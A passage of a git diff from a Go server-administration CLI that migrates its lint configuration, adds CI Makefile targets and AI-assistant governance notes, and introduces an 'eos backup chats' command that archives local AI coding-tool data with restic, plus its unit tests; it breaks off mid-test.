- exclude-functions:
- - (*github.com/spf13/cobra.Command).MarkFlagRequired # Cobra flags
-
- # Go vet configuration
- govet:
- enable-all: true
- disable:
- - shadow # Too noisy for large projects
- - fieldalignment # Struct field ordering for memory - not critical
-
- # Staticcheck configuration
- staticcheck:
- checks: ["all", "-SA1019"] # All checks except deprecated usage (we handle separately)
-
- # Style configuration
- # gofmt: # REMOVED: gofmt is not a linter in golangci-lint v2
- # simplify: true
-
- # goimports: # REMOVED: goimports is not a linter in golangci-lint v2
- # local-prefixes: github.com/CodeMonkeyCybersecurity/eos
-
- # Complexity limits
- nakedret:
- max-func-lines: 5 # Only allow naked returns in very short functions
-
- # Constant detection
- goconst:
- min-len: 3 # Minimum length of string constant
- min-occurrences: 3 # Minimum occurrences to trigger
- ignore-tests: true # Don't check test files
-
- # Unused parameters
- unparam:
- check-exported: false # Don't check exported functions (may be interface implementations)
-
-# Run Configuration
-run:
- timeout: 10m # Maximum time for linters to run
- tests: true # Include test files
- build-tags:
- - integration
- - unit
- skip-dirs:
- - vendor
- - testdata
- - .github
- - docs
- skip-files:
- - ".*\\.pb\\.go$" # Skip protobuf generated files
- - ".*_gen\\.go$" # Skip generated files
+ - nakedret
+ - nilerr
+
+ # Per-linter settings (v2: nested under linters.settings)
+ settings:
+ gosec:
+ severity: medium
+ confidence: medium
+ excludes:
+ - G104 # Covered by errcheck
+ - G304 # File path from variable - common in CLI tools
+ - G306 # WriteFile permissions - we use constants
+
+ errcheck:
+ check-blank: true
+ check-type-assertions: true
+ exclude-functions:
+ - (*github.com/spf13/cobra.Command).MarkFlagRequired
+
+ govet:
+ enable-all: true
+ disable:
+ - shadow # Too noisy for large projects
+ - fieldalignment # Struct field ordering - not critical
+
+ staticcheck:
+ checks: ["all", "-SA1019"] # All except deprecated usage
+
+ nakedret:
+ max-func-lines: 5
+
+ goconst:
+ min-len: 3
+ min-occurrences: 3
+ ignore-tests: true
+
+ unparam:
+ check-exported: false
+
+ # Exclusion rules (v2: nested under linters.exclusions)
+ exclusions:
+ # Do not use default exclusion presets
+ presets: []
+
+ # Path-based exclusions (replaces skip-dirs and skip-files)
+ paths:
+ - vendor
+ - testdata
+ - third_party$
+ - ".*\\.pb\\.go$"
+ - ".*_gen\\.go$"
+
+ # Rule-based exclusions (replaces issues.exclude-rules)
+ rules:
+ # Test files - relaxed rules
+ - path: _test\.go
+ linters:
+ - errcheck
+ - gosec
+ - unparam
+ - goconst
+
+ # cmd/ orchestration layer
+ - path: ^cmd/
+ linters:
+ - goconst
+ - unparam
+
+ # Mock/stub files
+ - path: "(mock|stub|fake).*\\.go"
+ linters:
+ - errcheck
+ - gosec
+
+ # Unchecked Close/Flush/Remove - safe to ignore
+ - text: "Error return value of .((os\\.)?std(out|err)\\..*|.*Close|.*Flush|os\\.Remove(All)?|.*print(f|ln)?|os\\.(Un)?Setenv). is not checked"
+ linters:
+ - errcheck
# Issues Configuration
issues:
- # Maximum issues to report (0 = unlimited)
max-issues-per-linter: 0
max-same-issues: 0
-
- # Show all issues, even in new code
new: false
- # Exclude rules for specific cases
- exclude-rules:
- # Test files - allow certain patterns
- - path: _test\.go
- linters:
- - errcheck # Tests can ignore errors for brevity
- - gosec # Tests can have security "issues" (like hardcoded creds for mocks)
- - unparam # Test helpers may have unused params
- - goconst # Tests can repeat strings
-
- # cmd/ orchestration layer - allow embedding
- - path: ^cmd/
- linters:
- - goconst # Orchestration layer can embed strings
- - unparam # CLI commands may not use all cobra.Command fields
-
- # Mock/stub files
- - path: "(mock|stub|fake).*\\.go"
- linters:
- - errcheck
- - gosec
-
- # Exclude specific error messages globally
- - text: "Error return value of .((os\\.)?std(out|err)\\..*|.*Close|.*Flush|os\\.Remove(All)?|.*print(f|ln)?|os\\.(Un)?Setenv). is not checked"
- linters:
- - errcheck
-
- # Exclude TODOs/FIXMEs from being errors (warnings only)
- - text: "Line contains TODO/BUG/FIXME"
- linters:
- - godox
-
- # Don't exclude issues in vendor or generated code
- exclude-use-default: false
-
# Output Configuration
output:
- # In v2, formats is a map (not a slice)
formats:
- text: # Human-readable colored output (replaces 'colored-line-number' in v1)
+ text:
path: stdout
- print-issued-lines: true
print-linter-name: true
colors: true
- uniq-by-line: true # Show multiple issues on same line
- sort-results: true # Sort results for consistent output
- path-prefix: "" # Don't modify paths in output
+ sort-results: true
+ sort-order:
+ - linter
+ - file
+ show-stats: true
# Severity Configuration
-# NOTE: Disabled due to golangci-lint v2 configuration changes
-# severity:
-# default-severity: error
-# case-sensitive: false
-# rules:
-# - linters:
-# - gosec
-# severity: error
-# - linters:
-# - errcheck
-# - staticcheck
-# - govet
-# severity: error
-# - linters:
-# - misspell
-# - goconst
-# severity: warning
+severity:
+ default: error
+ rules:
+ - linters:
+ - misspell
+ - goconst
+ severity: warning
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index cec96313a..8e3e115e9 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -47,6 +47,15 @@ repos:
# Local hooks for custom checks
- repo: local
hooks:
+ # Enforce local/CI parity lane via mage-compatible entrypoint
+ - id: ci-debug-parity
+ name: CI debug parity gate (magew ci:debug)
+ entry: ./magew ci:debug
+ language: system
+ pass_filenames: false
+ require_serial: true
+ description: Runs the same ci:debug lane used by hooks and CI
+
# Run fast tests (skip integration and E2E)
- id: go-test-fast
name: Run unit tests
@@ -66,7 +75,7 @@ repos:
# Build verification
- id: go-build
name: Verify build
- entry: go build -o /tmp/eos-build-precommit ./cmd/
+ entry: go build -o /tmp/eos-build-precommit .
language: system
pass_filenames: false
description: Ensures code compiles successfully
diff --git a/CLAUDE.md b/CLAUDE.md
index 0c36d26b3..7b2c7c4af 100644
--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -1,14 +1,34 @@
# CLAUDE.md
-*Last Updated: 2025-11-07*
+*Last Updated: 2026-02-28*
AI assistant guidance for Eos - A Go-based CLI for Ubuntu server administration by Code Monkey Cybersecurity (ABN 77 177 673 061).
**IMPORTANT**: For roadmap, technical debt tracking, and future work planning, see [ROADMAP.md](ROADMAP.md). This file focuses on immediate development standards and patterns.
-**RECENT ADDITIONS** (2025-10-28):
-- ✅ Caddy Admin API infrastructure completed - see [ROADMAP.md](ROADMAP.md#-technical-debt---caddy-configuration-management-future-direction)
-- ✅ QUIC/HTTP3 firewall support (UDP/443) - see [ROADMAP.md](ROADMAP.md#-quichttp3-support---firewall-configuration-2025-10-28)
+## Governance Contracts
+
+Governance contracts live in the `prompts/` submodule (also accessible via `third_party/prompts/` symlink). All 6 contracts are read-before-starting requirements for every session.
+
+| Contract | Governs | File |
+|----------|---------|------|
+| **Documentation** | What/how/where to document | [DOCUMENTATION.md](third_party/prompts/DOCUMENTATION.md) |
+| **Testing** | Test standards, coverage, evidence | [TESTING.md](third_party/prompts/TESTING.md) |
+| **Workflow** | CI checks, PR requirements, branch lifecycle | [WORKFLOW.md](third_party/prompts/WORKFLOW.md) |
+| **Git Rules** | Signing, linear history, branch invariants | [GIT-RULES.md](third_party/prompts/GIT-RULES.md) |
+| **Security** | Secrets, scanning, supply chain, OWASP | [SECURITY.md](third_party/prompts/SECURITY.md) |
+| **Coordination** | Multi-agent isolation, scope, conflicts | [COORDINATION.md](third_party/prompts/COORDINATION.md) |
+
+Supporting runbooks:
+- **Session workflow**: [SOAPIER.md](third_party/prompts/SOAPIER.md) — 14-step session process
+- **Git Hygiene**: [GIT-HYGIENE.md](third_party/prompts/GIT-HYGIENE.md) — compliance procedures (Phases A-G)
+- **Adversarial review**: [ADVERSARIAL.md](third_party/prompts/ADVERSARIAL.md) — gap analysis and review techniques
+
+Available skills:
+- `/soapier` — start SOAPIER session (runs git hygiene, checks issue/branch)
+- `/git-hygiene` — run git hygiene checks (Phase A + F)
+- `/pr-ready` — verify PR readiness (all step 13 checks)
+- `/isobar-handover` — generate ISoBAR handover when blocked
## Mission & Values
diff --git a/Makefile b/Makefile
index 024e28203..a624e8d3a 100644
--- a/Makefile
+++ b/Makefile
@@ -1,7 +1,9 @@
# Eos Makefile
# Last Updated: 2025-10-23
-.PHONY: all build test lint lint-fix clean install help
+.PHONY: all build test lint lint-fix clean install help \
+ ci-preflight ci-lint ci-unit ci-integration ci-e2e-smoke ci-fuzz ci-coverage-delta \
+ ci-debug ci-verify-parity governance-check submodule-freshness
# Build configuration
BINARY_NAME := eos
@@ -32,11 +34,11 @@ help: ## Display this help
build: ## Build Eos binary with CGO support
@echo "[INFO] Building Eos with libvirt and Ceph support..."
@echo "[INFO] CGO_ENABLED=$(CGO_ENABLED)"
- CGO_ENABLED=$(CGO_ENABLED) go build $(BUILD_FLAGS) -ldflags "$(LDFLAGS)" -o $(BUILD_DIR)/$(BINARY_NAME) ./cmd/
+ CGO_ENABLED=$(CGO_ENABLED) go build $(BUILD_FLAGS) -ldflags "$(LDFLAGS)" -o $(BUILD_DIR)/$(BINARY_NAME) .
build-debug: ## Build with debug symbols and race detector
@echo "[INFO] Building Eos with debug symbols..."
- CGO_ENABLED=$(CGO_ENABLED) go build $(BUILD_FLAGS) -race -o $(BUILD_DIR)/$(BINARY_NAME)-debug ./cmd/
+ CGO_ENABLED=$(CGO_ENABLED) go build $(BUILD_FLAGS) -race -o $(BUILD_DIR)/$(BINARY_NAME)-debug .
install: build ## Build and install Eos to /usr/local/bin
@echo "[INFO] Installing Eos to $(INSTALL_DIR)..."
@@ -195,6 +197,58 @@ ci: deps fmt-check vet lint test build ## CI pipeline (no auto-fix)
ci-cgo: deps fmt-check vet-cgo lint-cgo test-cgo build ## CI pipeline for CGO packages
@echo "[INFO] CGO CI pipeline complete"
+ci-preflight: ## Run CI preflight checks
+ @echo "[INFO] Running CI preflight..."
+ @scripts/ci/preflight.sh
+
+ci-lint: ## Run CI lint lane entrypoint
+ @echo "[INFO] Running CI lint lane..."
+ @scripts/ci/lint.sh all
+
+ci-unit: ## Run CI unit lane entrypoint
+ @echo "[INFO] Running CI unit lane..."
+ @scripts/ci/test.sh unit
+
+ci-integration: ## Run CI integration lane entrypoint
+ @echo "[INFO] Running CI integration lane..."
+ @scripts/ci/test.sh integration
+
+ci-e2e-smoke: ## Run CI smoke E2E lane entrypoint
+ @echo "[INFO] Running CI e2e smoke lane..."
+ @scripts/ci/test.sh e2e-smoke
+
+ci-fuzz: ## Run CI fuzz lane entrypoint
+ @echo "[INFO] Running CI fuzz lane..."
+ @scripts/ci/test.sh fuzz
+
+ci-coverage-delta: ## Run CI coverage delta check (PR context)
+ @echo "[INFO] Running CI coverage delta..."
+ @scripts/ci/coverage-delta.sh coverage.out
+
+ci-debug: ## Run local CI parity lane (same command as pre-commit and CI debug job)
+ @echo "[INFO] Running CI debug parity lane..."
+ @./magew ci:debug
+
+ci-verify-parity: ## Verify pre-commit, mage, and workflow ci:debug parity contract
+ @echo "[INFO] Verifying ci:debug parity contract..."
+ @bash scripts/ci/verify-parity.sh
+
+governance-check: ## Run governance wiring checks from prompts submodule
+ @echo "[INFO] Running governance checks..."
+ @scripts/check-governance.sh
+
+submodule-freshness: ## Verify prompts submodule is current with upstream main
+ @echo "[INFO] Checking prompts submodule freshness..."
+ @scripts/prompts-submodule-freshness.sh
+
+test-submodule-freshness: ## Run submodule freshness test pyramid (unit/integration/e2e)
+ @echo "[INFO] Running submodule freshness test pyramid..."
+ @bash test/ci/test-submodule-freshness.sh
+
+test-governance-check: ## Run governance wrapper tests
+ @echo "[INFO] Running governance wrapper tests..."
+ @bash test/ci/test-governance-check.sh
+
##@ Deployment
DEPLOY_SERVERS ?= vhost2
diff --git a/cmd/backup/chats.go b/cmd/backup/chats.go
new file mode 100644
index 000000000..eb20dbf47
--- /dev/null
+++ b/cmd/backup/chats.go
@@ -0,0 +1,402 @@
+// cmd/backup/chats.go
+// Command orchestration for machine-wide AI chat archive backup
+//
+// Provides: eos backup chats [--setup|--prune|--list|--dry-run]
+//
+// This command backs up conversations, settings, and context files from
+// all AI coding tools (Claude Code, Codex, VS Code, Windsurf, Cursor,
+// Continue, Amazon Q, Aider) plus project-level CLAUDE.md/AGENTS.md files.
+
+package backup
+
+import (
+ "errors"
+ "fmt"
+ "os"
+ "os/user"
+ "strings"
+
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/chatbackup"
+ eos "github.com/CodeMonkeyCybersecurity/eos/pkg/eos_cli"
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/eos_err"
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/eos_io"
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/verify"
+ "github.com/spf13/cobra"
+ "github.com/uptrace/opentelemetry-go-extra/otelzap"
+ "go.uber.org/zap"
+)
+
+var chatsCmd = &cobra.Command{
+ Use: "chats",
+ Short: "Back up AI coding tool conversations, settings, and context",
+ Long: `Machine-wide backup of all AI coding assistant data using restic.
+
+Backs up conversations, settings, memory files, and project context from:
+ - Claude Code (~/.claude): sessions, settings, MEMORY.md, todos, plans
+ - OpenAI Codex (~/.codex): sessions, config, skills, archives, exports
+ - VS Code (~/.config/Code): Cline, Roo Code, Copilot chat history
+ - Windsurf (~/.config/Windsurf): global storage, settings
+ - Cursor (~/.config/Cursor): state database, settings
+ - Continue (~/.continue): sessions, config
+ - Amazon Q (~/.aws/amazonq): chat history
+ - Aider (~/.aider.*): chat history
+ - OpenClaw (~/.openclaw): config, sessions, skills, environment vars
+ - Gemini CLI (~/.gemini): shell history, session checkpoints, config
+ - ChatGPT Desktop (~/.config/ChatGPT): third-party desktop app data
+ - Gemini Desktop (~/.config/gemini-desktop): third-party desktop app data
+ - Project context: CLAUDE.md, AGENTS.md, .claude/ dirs in /opt/
+
+Features:
+ - Hourly deduplication via restic (block-level)
+ - AES-256 encryption at rest
+ - Retention policy (48h all, 24 hourly, 7 daily, 4 weekly, 12 monthly)
+ - Scheduled via cron (--setup)
+
+Examples:
+ # First-time setup (creates repo, password, cron job)
+ sudo eos backup chats --setup
+
+ # Run a backup now
+ eos backup chats
+
+ # Preview what would be backed up
+ eos backup chats --dry-run
+
+ # Apply retention policy (prune old snapshots)
+ eos backup chats --prune
+
+ # List existing snapshots
+ eos backup chats --list
+
+ # Backup for a specific user
+ sudo eos backup chats --user henry`,
+
+ RunE: eos.Wrap(runBackupChats),
+}
+
+var (
+ chatbackupRunBackupFn = chatbackup.RunBackup
+ chatbackupSetupFn = chatbackup.Setup
+ chatbackupRunPruneFn = chatbackup.RunPrune
+ chatbackupListSnapshotsFn = chatbackup.ListSnapshots
+)
+
+func init() {
+ BackupCmd.AddCommand(chatsCmd)
+
+ chatsCmd.Flags().Bool("setup", false, "Initialize restic repository, generate password, and configure hourly cron")
+ chatsCmd.Flags().Bool("prune", false, "Apply retention policy to remove old snapshots")
+ chatsCmd.Flags().Bool("list", false, "List existing snapshots")
+ chatsCmd.Flags().Bool("dry-run", false, "Show what would be backed up without making changes")
+ chatsCmd.Flags().String("user", "", "User whose data to back up (defaults to current user or SUDO_USER)")
+ chatsCmd.Flags().StringSlice("scan-dirs", []string{"/opt"}, "Additional directories to scan for project-level AI context files")
+ chatsCmd.Flags().Bool("verbose", false, "Show detailed path discovery logging")
+
+ // Retention flags (for --setup and --prune)
+ chatsCmd.Flags().String("keep-within", chatbackup.DefaultKeepWithin, "Keep all snapshots within this duration")
+ chatsCmd.Flags().Int("keep-hourly", chatbackup.DefaultKeepHourly, "Hourly snapshots to keep after keep-within")
+ chatsCmd.Flags().Int("keep-daily", chatbackup.DefaultKeepDaily, "Daily snapshots to keep")
+ chatsCmd.Flags().Int("keep-weekly", chatbackup.DefaultKeepWeekly, "Weekly snapshots to keep")
+ chatsCmd.Flags().Int("keep-monthly", chatbackup.DefaultKeepMonthly, "Monthly snapshots to keep")
+
+ // Schedule flags (for --setup)
+ chatsCmd.Flags().String("backup-cron", chatbackup.DefaultBackupCron, "Cron schedule for backups")
+ chatsCmd.Flags().String("prune-cron", chatbackup.DefaultPruneCron, "Cron schedule for pruning")
+
+ chatsCmd.MarkFlagsMutuallyExclusive("setup", "prune", "list")
+ chatsCmd.MarkFlagsMutuallyExclusive("list", "dry-run")
+}
+
+func runBackupChats(rc *eos_io.RuntimeContext, cmd *cobra.Command, args []string) error {
+ logger := otelzap.Ctx(rc.Ctx)
+
+ if err := verify.ValidateNoFlagLikeArgs(args); err != nil {
+ return err
+ }
+
+ // Parse user flag with fallback to SUDO_USER
+ username, _ := cmd.Flags().GetString("user")
+ if username == "" {
+ username = resolveCurrentUser()
+ }
+
+ retention, err := parseRetentionPolicy(cmd)
+ if err != nil {
+ return mapChatbackupError(rc, "parse retention policy", err)
+ }
+
+ dryRun, err := cmd.Flags().GetBool("dry-run")
+ if err != nil {
+ return mapChatbackupError(rc, "read dry-run flag", err)
+ }
+ verbose, err := cmd.Flags().GetBool("verbose")
+ if err != nil {
+ return mapChatbackupError(rc, "read verbose flag", err)
+ }
+ scanDirs, err := cmd.Flags().GetStringSlice("scan-dirs")
+ if err != nil {
+ return mapChatbackupError(rc, "read scan-dirs flag", err)
+ }
+
+ // Route to the appropriate operation
+ doSetup, err := cmd.Flags().GetBool("setup")
+ if err != nil {
+ return mapChatbackupError(rc, "read setup flag", err)
+ }
+ doPrune, err := cmd.Flags().GetBool("prune")
+ if err != nil {
+ return mapChatbackupError(rc, "read prune flag", err)
+ }
+ doList, err := cmd.Flags().GetBool("list")
+ if err != nil {
+ return mapChatbackupError(rc, "read list flag", err)
+ }
+
+ if err := validateModeFlags(doSetup, doPrune, doList, dryRun); err != nil {
+ return mapChatbackupError(rc, "validate mode flags", err)
+ }
+
+ switch {
+ case doSetup:
+ return runSetup(rc, logger, cmd, username, retention, dryRun)
+ case doPrune:
+ return runPrune(rc, logger, username, retention, dryRun)
+ case doList:
+ return runList(rc, logger, username)
+ default:
+ return runBackup(rc, logger, username, retention, scanDirs, dryRun, verbose)
+ }
+}
+
+func runSetup(rc *eos_io.RuntimeContext, logger otelzap.LoggerWithCtx, cmd *cobra.Command, username string, retention chatbackup.RetentionPolicy, dryRun bool) error {
+ backupCron, err := cmd.Flags().GetString("backup-cron")
+ if err != nil {
+ return mapChatbackupError(rc, "read backup-cron flag", err)
+ }
+ pruneCron, err := cmd.Flags().GetString("prune-cron")
+ if err != nil {
+ return mapChatbackupError(rc, "read prune-cron flag", err)
+ }
+
+ config := chatbackup.ScheduleConfig{
+ BackupConfig: chatbackup.BackupConfig{
+ User: username,
+ Retention: retention,
+ DryRun: dryRun,
+ },
+ BackupCron: backupCron,
+ PruneCron: pruneCron,
+ }
+
+ result, err := chatbackupSetupFn(rc, config)
+ if err != nil {
+ return mapChatbackupError(rc, "chat archive setup", err)
+ }
+
+ // Display results
+ logger.Info("Chat archive setup complete",
+ zap.Bool("cron_configured", result.CronConfigured),
+ zap.Bool("password_generated", result.PasswordGenerated),
+ zap.String("repo", result.RepoPath),
+ zap.String("password_file", result.PasswordFile),
+ zap.String("backup_cron", result.BackupCron),
+ zap.String("prune_cron", result.PruneCron))
+
+ if result.PasswordGenerated {
+ logger.Info("IMPORTANT: Save your restic password! View with: cat " + result.PasswordFile)
+ }
+
+ for _, w := range result.Warnings {
+ logger.Warn("Setup warning", zap.String("warning", w))
+ }
+
+ return nil
+}
+
+func runPrune(rc *eos_io.RuntimeContext, logger otelzap.LoggerWithCtx, username string, retention chatbackup.RetentionPolicy, dryRun bool) error {
+ config := chatbackup.BackupConfig{
+ User: username,
+ Retention: retention,
+ DryRun: dryRun,
+ }
+
+ if err := chatbackupRunPruneFn(rc, config); err != nil {
+ return mapChatbackupError(rc, "chat archive prune", err)
+ }
+
+ logger.Info("Chat archive prune completed")
+ return nil
+}
+
+func runList(rc *eos_io.RuntimeContext, logger otelzap.LoggerWithCtx, username string) error {
+ logger.Info("Listing chat archive snapshots", zap.String("user", username))
+
+ output, err := chatbackupListSnapshotsFn(rc, chatbackup.BackupConfig{User: username})
+ if err != nil {
+ return mapChatbackupError(rc, "list chat archive snapshots", err)
+ }
+ fmt.Print(output)
+
+ return nil
+}
+
+func runBackup(rc *eos_io.RuntimeContext, logger otelzap.LoggerWithCtx, username string, retention chatbackup.RetentionPolicy, scanDirs []string, dryRun, verbose bool) error {
+ config := chatbackup.BackupConfig{
+ User: username,
+ ExtraScanDirs: scanDirs,
+ Retention: retention,
+ DryRun: dryRun,
+ Verbose: verbose,
+ }
+
+ result, err := chatbackupRunBackupFn(rc, config)
+ if err != nil {
+ return mapChatbackupError(rc, "chat archive backup", err)
+ }
+
+ // Display results
+ if result.SnapshotID != "" {
+ logger.Info("Chat archive backup completed",
+ zap.String("snapshot_id", result.SnapshotID),
+ zap.Strings("tools_found", result.ToolsFound),
+ zap.Int("files_new", result.FilesNew),
+ zap.Int("files_changed", result.FilesChanged),
+ zap.Int("files_unmodified", result.FilesUnmodified),
+ zap.Int64("bytes_added", result.BytesAdded),
+ zap.String("duration", result.TotalDuration),
+ zap.Int("paths_backed_up", len(result.PathsBackedUp)),
+ zap.Int("paths_skipped", len(result.PathsSkipped)))
+ } else if dryRun {
+ logger.Info("DRY RUN complete",
+ zap.Strings("tools_found", result.ToolsFound),
+ zap.Int("paths_would_backup", len(result.PathsBackedUp)),
+ zap.Int("paths_not_found", len(result.PathsSkipped)))
+ } else {
+ logger.Info("No AI tool data found to back up")
+ }
+
+ return nil
+}
+
+// resolveCurrentUser determines the effective user for backup.
+// When running via sudo, falls back to SUDO_USER.
+func resolveCurrentUser() string {
+ if sudoUser := os.Getenv("SUDO_USER"); sudoUser != "" {
+ return sudoUser
+ }
+
+ u, err := user.Current()
+ if err != nil {
+ return ""
+ }
+
+ return u.Username
+}
+
+// FormatResult formats a backup result for display.
+func FormatResult(result *chatbackup.BackupResult) string {
+ var sb strings.Builder
+
+ sb.WriteString("\nChat Archive Backup Results\n")
+ sb.WriteString(strings.Repeat("-", 35) + "\n")
+
+ if result.SnapshotID != "" {
+ sb.WriteString(fmt.Sprintf("Snapshot: %s\n", result.SnapshotID))
+ sb.WriteString(fmt.Sprintf("Duration: %s\n", result.TotalDuration))
+ sb.WriteString(fmt.Sprintf("Files: %d new, %d changed, %d unmodified\n",
+ result.FilesNew, result.FilesChanged, result.FilesUnmodified))
+ sb.WriteString(fmt.Sprintf("Data added: %d bytes\n", result.BytesAdded))
+ }
+
+ if len(result.ToolsFound) > 0 {
+ sb.WriteString(fmt.Sprintf("Tools: %s\n", strings.Join(result.ToolsFound, ", ")))
+ }
+
+ return sb.String()
+}
+
+func parseRetentionPolicy(cmd *cobra.Command) (chatbackup.RetentionPolicy, error) {
+ retention := chatbackup.DefaultRetentionPolicy()
+
+ var err error
+ if cmd.Flags().Changed("keep-within") {
+ retention.KeepWithin, err = cmd.Flags().GetString("keep-within")
+ if err != nil {
+ return retention, err
+ }
+ }
+ if cmd.Flags().Changed("keep-hourly") {
+ retention.KeepHourly, err = cmd.Flags().GetInt("keep-hourly")
+ if err != nil {
+ return retention, err
+ }
+ }
+ if cmd.Flags().Changed("keep-daily") {
+ retention.KeepDaily, err = cmd.Flags().GetInt("keep-daily")
+ if err != nil {
+ return retention, err
+ }
+ }
+ if cmd.Flags().Changed("keep-weekly") {
+ retention.KeepWeekly, err = cmd.Flags().GetInt("keep-weekly")
+ if err != nil {
+ return retention, err
+ }
+ }
+ if cmd.Flags().Changed("keep-monthly") {
+ retention.KeepMonthly, err = cmd.Flags().GetInt("keep-monthly")
+ if err != nil {
+ return retention, err
+ }
+ }
+
+ return retention, nil
+}
+
+func validateModeFlags(setup, prune, list, dryRun bool) error {
+ modeCount := 0
+ if setup {
+ modeCount++
+ }
+ if prune {
+ modeCount++
+ }
+ if list {
+ modeCount++
+ }
+ if modeCount > 1 {
+ return eos_err.NewValidationError("flags --setup, --prune, and --list are mutually exclusive")
+ }
+ if list && dryRun {
+ return eos_err.NewValidationError("--dry-run cannot be combined with --list")
+ }
+ return nil
+}
+
+func mapChatbackupError(rc *eos_io.RuntimeContext, op string, err error) error {
+ _ = rc
+
+ switch {
+ case errors.Is(err, chatbackup.ErrResticNotInstalled):
+ return eos_err.NewDependencyError("restic", op, "Install with: sudo apt install restic")
+ case errors.Is(err, chatbackup.ErrRepositoryNotInitialized):
+ return eos_err.NewFilesystemError(
+ fmt.Sprintf("%s failed: chat backup repository is not initialized", op),
+ err,
+ "Run: eos backup chats --setup",
+ "Retry your original command",
+ )
+ case errors.Is(err, chatbackup.ErrBackupAlreadyRunning):
+ return eos_err.NewFilesystemError(
+ fmt.Sprintf("%s failed: another backup is currently running", op),
+ err,
+ "Wait for the current backup to finish",
+ "Check lock file: ~/.eos/restic/chat-archive.lock",
+ )
+ default:
+ if err == nil {
+ return nil
+ }
+ return fmt.Errorf("%s failed: %w", op, err)
+ }
+}
diff --git a/cmd/backup/chats_test.go b/cmd/backup/chats_test.go
new file mode 100644
index 000000000..918138d53
--- /dev/null
+++ b/cmd/backup/chats_test.go
@@ -0,0 +1,374 @@
+package backup
+
+import (
+ "context"
+ "errors"
+ "fmt"
+ "os"
+ "testing"
+
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/chatbackup"
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/eos_err"
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/eos_io"
+ "github.com/spf13/cobra"
+ "github.com/stretchr/testify/assert"
+ "github.com/stretchr/testify/require"
+ "github.com/uptrace/opentelemetry-go-extra/otelzap"
+)
+
+func newChatsTestCommand(t *testing.T) *cobra.Command {
+ t.Helper()
+
+ cmd := &cobra.Command{Use: "chats"}
+ cmd.Flags().Bool("setup", false, "")
+ cmd.Flags().Bool("prune", false, "")
+ cmd.Flags().Bool("list", false, "")
+ cmd.Flags().Bool("dry-run", false, "")
+ cmd.Flags().String("user", "", "")
+ cmd.Flags().StringSlice("scan-dirs", []string{"/opt"}, "")
+ cmd.Flags().Bool("verbose", false, "")
+ cmd.Flags().String("keep-within", chatbackup.DefaultKeepWithin, "")
+ cmd.Flags().Int("keep-hourly", chatbackup.DefaultKeepHourly, "")
+ cmd.Flags().Int("keep-daily", chatbackup.DefaultKeepDaily, "")
+ cmd.Flags().Int("keep-weekly", chatbackup.DefaultKeepWeekly, "")
+ cmd.Flags().Int("keep-monthly", chatbackup.DefaultKeepMonthly, "")
+ cmd.Flags().String("backup-cron", chatbackup.DefaultBackupCron, "")
+ cmd.Flags().String("prune-cron", chatbackup.DefaultPruneCron, "")
+ return cmd
+}
+
+func newChatsRuntimeContext() *eos_io.RuntimeContext {
+ return eos_io.NewContext(context.Background(), "chats-test")
+}
+
+func resetChatbackupFns(t *testing.T) {
+ t.Helper()
+
+ origRunBackup := chatbackupRunBackupFn
+ origSetup := chatbackupSetupFn
+ origRunPrune := chatbackupRunPruneFn
+ origList := chatbackupListSnapshotsFn
+
+ t.Cleanup(func() {
+ chatbackupRunBackupFn = origRunBackup
+ chatbackupSetupFn = origSetup
+ chatbackupRunPruneFn = origRunPrune
+ chatbackupListSnapshotsFn = origList
+ })
+}
+
+func TestResolveCurrentUser_PrefersSudoUser(t *testing.T) {
+ old, had := os.LookupEnv("SUDO_USER")
+ require.NoError(t, os.Setenv("SUDO_USER", "henry"))
+ t.Cleanup(func() {
+ if had {
+ _ = os.Setenv("SUDO_USER", old)
+ return
+ }
+ _ = os.Unsetenv("SUDO_USER")
+ })
+
+ assert.Equal(t, "henry", resolveCurrentUser())
+}
+
+func TestResolveCurrentUser_CurrentUserFallback(t *testing.T) {
+ old, had := os.LookupEnv("SUDO_USER")
+ _ = os.Unsetenv("SUDO_USER")
+ t.Cleanup(func() {
+ if had {
+ _ = os.Setenv("SUDO_USER", old)
+ return
+ }
+ _ = os.Unsetenv("SUDO_USER")
+ })
+
+ assert.NotEmpty(t, resolveCurrentUser())
+}
+
+func TestValidateModeFlags(t *testing.T) {
+ require.NoError(t, validateModeFlags(false, false, false, false))
+ require.NoError(t, validateModeFlags(true, false, false, false))
+ require.NoError(t, validateModeFlags(false, true, false, false))
+ require.NoError(t, validateModeFlags(false, false, true, false))
+
+ err := validateModeFlags(true, true, false, false)
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "mutually exclusive")
+
+ err = validateModeFlags(false, false, true, true)
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "--dry-run cannot be combined with --list")
+}
+
+func TestParseRetentionPolicy(t *testing.T) {
+ cmd := newChatsTestCommand(t)
+ require.NoError(t, cmd.Flags().Set("keep-within", "72h"))
+ require.NoError(t, cmd.Flags().Set("keep-daily", "10"))
+
+ got, err := parseRetentionPolicy(cmd)
+ require.NoError(t, err)
+ assert.Equal(t, "72h", got.KeepWithin)
+ assert.Equal(t, 10, got.KeepDaily)
+ assert.Equal(t, chatbackup.DefaultKeepHourly, got.KeepHourly)
+}
+
+func TestParseRetentionPolicy_AllOverrides(t *testing.T) {
+ cmd := newChatsTestCommand(t)
+ require.NoError(t, cmd.Flags().Set("keep-within", "24h"))
+ require.NoError(t, cmd.Flags().Set("keep-hourly", "12"))
+ require.NoError(t, cmd.Flags().Set("keep-daily", "3"))
+ require.NoError(t, cmd.Flags().Set("keep-weekly", "2"))
+ require.NoError(t, cmd.Flags().Set("keep-monthly", "6"))
+
+ got, err := parseRetentionPolicy(cmd)
+ require.NoError(t, err)
+ assert.Equal(t, "24h", got.KeepWithin)
+ assert.Equal(t, 12, got.KeepHourly)
+ assert.Equal(t, 3, got.KeepDaily)
+ assert.Equal(t, 2, got.KeepWeekly)
+ assert.Equal(t, 6, got.KeepMonthly)
+}
+
+func TestParseRetentionPolicy_TypeError(t *testing.T) {
+ cmd := &cobra.Command{Use: "chats"}
+ cmd.Flags().String("keep-within", chatbackup.DefaultKeepWithin, "")
+ cmd.Flags().String("keep-hourly", "24", "")
